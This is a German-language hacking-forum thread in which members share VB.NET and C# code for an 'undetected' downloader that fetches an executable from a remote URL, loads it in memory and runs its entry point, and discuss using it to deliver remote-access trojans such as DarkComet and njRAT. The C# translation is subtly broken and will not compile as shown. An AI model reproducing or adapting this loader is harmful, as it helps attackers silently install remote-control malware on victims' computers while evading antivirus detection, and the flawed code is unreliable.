Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

Runtime undetected ( ? ) Downloader

- - - - -
Started by most_uniQue ,

  • Please log in to reply
10 replies to this topic

#1
most_uniQue
Posted 17 July 2014 - 22:49 Uhr

most_uniQue

    AV Agent

  • Premium Member
    • Likes
    228
  • 478 posts
  • 500 Bedankt
  • iPhone
  • Windows, Linux, Mac OS
Hey,
mal was für die Coder unter euch.
Hab hier 2 Subs, welche für einen Runtime undetected Downloader sein sollen.
    Imports System.Threading
    Imports System.Reflection
    Imports System.Net
	
    Public Sub DownloadExecute(ByVal url As String)
	  Dim c As New WebClient
	  Execute(c.DownloadData(url))
	    End Sub
	
	    Public Sub Execute(ByVal bytes As Byte())
	  Dim t As New Thread(AddressOf DoExecute)
	  t.TrySetApartmentState(ApartmentState.STA)
	  t.Start(bytes)
	    End Sub
	
	    Public Sub DoExecute(ByVal d As Byte())
	  If d(&H3C) = &H80 Then
	    Dim asm As Assembly = Assembly.Load(d)
	    Dim entryPoint As MethodInfo = asm.EntryPoint
	    Dim o As Object() = Nothing
	    If entryPoint.GetParameters().Length > 0 Then
	    o = New Object() {New String() {"1"}}
	    End If
	    entryPoint.Invoke(Nothing, o)
	    Application.Exit()
	  End If
	    End Sub
	
    'usage: DownloadExecute("http://missioncoders.info/file.exe")

Stimmt der Code so?

lg
most_uniQue

Eingefügtes Bild

#2
Cube
Posted 18 July 2014 - 06:47 Uhr

Cube

    Würfel

  • Banned
  • PipPipPipPipPipPipPipPipPipPip
    • Likes
    7
  • 819 posts
  • 1062 Bedankt
  • Android, Android [root]
  • Windows, Linux
Is ne Runtime Möglichkeit ja.
Wird mit Invoke aufgerufen.
Allerdings dürfte dies nur für .Net Files gelten.

Grüße
Cube

Jabber: cube@exploit.im

Only with OTR!

 

HQ Password-Recovery-Tool (Browser, Mail uvm.): TripleCCC

#3
most_uniQue
Posted 18 July 2014 - 08:25 Uhr

most_uniQue

    AV Agent

  • Premium Member
    • Likes
    228
  • 478 posts
  • 500 Bedankt
  • iPhone
  • Windows, Linux, Mac OS
Naja also könnt ich im Prinzip damit nen Downloader erstellen, der halt den server von DC zb lädt? Ist ja VB, wenn ich mich nicht täusche.

Eingefügtes Bild

#4
pdr0
Posted 18 July 2014 - 13:40 Uhr

pdr0

    Pentester

  • Premium Member
    • Likes
    86
  • 148 posts
  • 87 Bedankt
Es ist VB.NET, ich reich mal C# nach ;)

Please Login HERE or Register HERE to see this link!


using System.Threading;
using System.Reflection;
using System.Net;

    
    public void DownloadExecute(string url) {
	    WebClient c = new WebClient();
	    Execute(c.DownloadData(url));
    }
    
    public void Execute(byte[] bytes) {
	    Thread t = new Thread(new System.EventHandler(this.DoExecute));
	    t.TrySetApartmentState(ApartmentState.STA);
	    t.Start(bytes);
    }
    
    public void DoExecute(byte[] d) {
	    if ((d(60) == 128)) {
		    object asm;
		    Load(d);
		    MethodInfo entryPoint = asm.EntryPoint;
		    object[] o = null;
		    if ((entryPoint.GetParameters().Length > 0)) {
			    o = new object[] {
					    new string[] {
							    "1"}};
		    }
		    entryPoint.Invoke(null, o);
		    Application.Exit();
	    }
    }

Edited by pdr0, 18 July 2014 - 13:41 Uhr.

  • most_uniQue likes this

#5
Cube
Posted 18 July 2014 - 14:33 Uhr

Cube

    Würfel

  • Banned
  • PipPipPipPipPipPipPipPipPipPip
    • Likes
    7
  • 819 posts
  • 1062 Bedankt
  • Android, Android [root]
  • Windows, Linux

Naja also könnt ich im Prinzip damit nen Downloader erstellen, der halt den server von DC zb lädt? Ist ja VB, wenn ich mich nicht täusche.


Darkcomet is written in Delphi. ;)
  • most_uniQue likes this

Jabber: cube@exploit.im

Only with OTR!

 

HQ Password-Recovery-Tool (Browser, Mail uvm.): TripleCCC

#6
most_uniQue
Posted 18 July 2014 - 15:17 Uhr

most_uniQue

    AV Agent

  • Premium Member
    • Likes
    228
  • 478 posts
  • 500 Bedankt
  • iPhone
  • Windows, Linux, Mac OS

Darkcomet is written in Delphi. ;)


Ich sage ja " Wenn ich micht nicht täusche " :D
Aber nJRat müsste dann ja gehen.

Eingefügtes Bild

#7
Cube
Posted 18 July 2014 - 15:20 Uhr

Cube

    Würfel

  • Banned
  • PipPipPipPipPipPipPipPipPipPip
    • Likes
    7
  • 819 posts
  • 1062 Bedankt
  • Android, Android [root]
  • Windows, Linux

Ich sage ja " Wenn ich micht nicht täusche " :D
Aber nJRat müsste dann ja gehen.


Sollte klar gehn.
Dürfte in VB.net 2.0 geschrieben wordn sein. :P

Jabber: cube@exploit.im

Only with OTR!

 

HQ Password-Recovery-Tool (Browser, Mail uvm.): TripleCCC

#8
most_uniQue
Posted 18 July 2014 - 15:37 Uhr

most_uniQue

    AV Agent

  • Premium Member
    • Likes
    228
  • 478 posts
  • 500 Bedankt
  • iPhone
  • Windows, Linux, Mac OS
Weiß du auch zufüllig ob .Net 2 auf jedem PC Standart ist ? :D
Ich hab nichts verlässliches gefunden auf die schnelle.

Eingefügtes Bild

#9
Smn
Posted 18 July 2014 - 15:40 Uhr

Smn

    Ninja

  • Premium Member
    • Likes
    61
  • 81 posts
  • 103 Bedankt
  • Windows, Linux

Weiß du auch zufüllig ob .Net 2 auf jedem PC Standart ist ? :D
Ich hab nichts verlässliches gefunden auf die schnelle.


.Net Framework 2.0 ist soweit ich weiß ab Windows XP SP2 standard.

mfg

Edited by Smn, 18 July 2014 - 16:51 Uhr.

  • most_uniQue likes this

#10
pdr0
Posted 18 July 2014 - 16:19 Uhr

pdr0

    Pentester

  • Premium Member
    • Likes
    86
  • 148 posts
  • 87 Bedankt
Weiß jemand ob das nur für .NET Binaries geht oder kann es ausprobieren?

Assembly.Load will ja "nur" COFF (also PE

Please Login HERE or Register HERE to see this link!

).

Wenn es auch für native Binaries geht, sollte es auch mit DC gehen.

#11
Cube
Posted 18 July 2014 - 16:26 Uhr

Cube

    Würfel

  • Banned
  • PipPipPipPipPipPipPipPipPipPip
    • Likes
    7
  • 819 posts
  • 1062 Bedankt
  • Android, Android [root]
  • Windows, Linux

.Net Framework 2.0 ist soweit ich weiß ab Windows XP SP2 standart.

mfg


Das ist korrekt .
Und bitte StandarD und nicht StandarT :huh:

Weiß jemand ob das nur für .NET Binaries geht oder kann es ausprobieren?

Assembly.Load will ja "nur" COFF (also PE

Please Login HERE or Register HERE to see this link!

).

Wenn es auch für native Binaries geht, sollte es auch mit DC gehen.


Mag stimmen, allerdings selbst schon damit etwas handtiert und mir crashts die native Files immer.
Allerdings auch nur 3 selfcoded Sachen getestet.

Grüße

Jabber: cube@exploit.im

Only with OTR!

 

HQ Password-Recovery-Tool (Browser, Mail uvm.): TripleCCC

Thanked by 1 Member:
pdr0
Back to   Hilfe / Fragen / Unterstützung

  Topic Forum Started By Stats Last Post Info

user(s) are reading this topic

members, guests, anonymous users


This topic has been visited by 32 user(s)


    4cyberbase, AdlerRhy, Bad Grandpa, corkscrew, Cube, D3r0ma, eq22, FullMetall, funstyler, G0rki, GEFXR, Grauwolf, KingMickey, lion., loken, lolorollo, mettbrot, most_uniQue, nibble nibble, PaulaAbdul, pdr0, peppi200, ProHex, push eax, Red Hat, SAR, Smn, synnergy, Toskom4n, Xenio, zepsus, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.   Hilfe / Fragen / Unterstützung